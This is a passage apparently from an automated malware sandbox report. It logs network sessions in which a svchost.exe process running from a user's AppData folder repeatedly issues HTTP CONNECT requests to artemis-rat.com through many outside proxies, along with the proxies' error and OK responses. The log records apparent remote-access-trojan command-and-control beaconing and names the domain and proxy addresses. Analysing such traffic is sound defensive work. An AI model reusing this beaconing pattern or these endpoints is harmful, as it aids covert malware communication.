                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2041192.168.2.55626720.24.43.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.610934019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.940367937 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2042192.168.2.556443172.67.181.208043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.616003036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.770617962 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2043192.168.2.556430162.240.72.1393744543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.620990992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.138165951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880345106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2044192.168.2.55632093.190.142.573124343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.647363901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.941826105 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2045192.168.2.55635954.178.159.1991808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.647435904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.907586098 CET503INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 324
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2046192.168.2.555452164.92.86.1136298743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.647504091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333415985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2047192.168.2.556304193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.648410082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2048192.168.2.556514104.20.225.2188043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.653590918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.807938099 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2049192.168.2.556492146.190.35.152800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.655626059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.833410025 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2050192.168.2.55646773.151.59.352081643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.658126116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2051192.168.2.556322128.140.26.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.658252001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2052192.168.2.556715202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.665126085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2053192.168.2.556502142.4.123.418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.665947914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2054192.168.2.556716202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.667176962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2055192.168.2.556718202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.669773102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2056192.168.2.556719202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.670948982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2057192.168.2.556518104.25.64.278043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.671658993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.826039076 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2058192.168.2.55634051.89.173.403019943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.673705101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.333111048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2059192.168.2.556528104.22.50.2208043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.674954891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.829401970 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2060192.168.2.556475157.185.157.1512658943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.680757046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2061192.168.2.556321178.54.21.203808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.680830002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2062192.168.2.556542185.162.229.2158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.682099104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.836148977 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2063192.168.2.556548172.67.105.2348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.684840918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.839027882 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
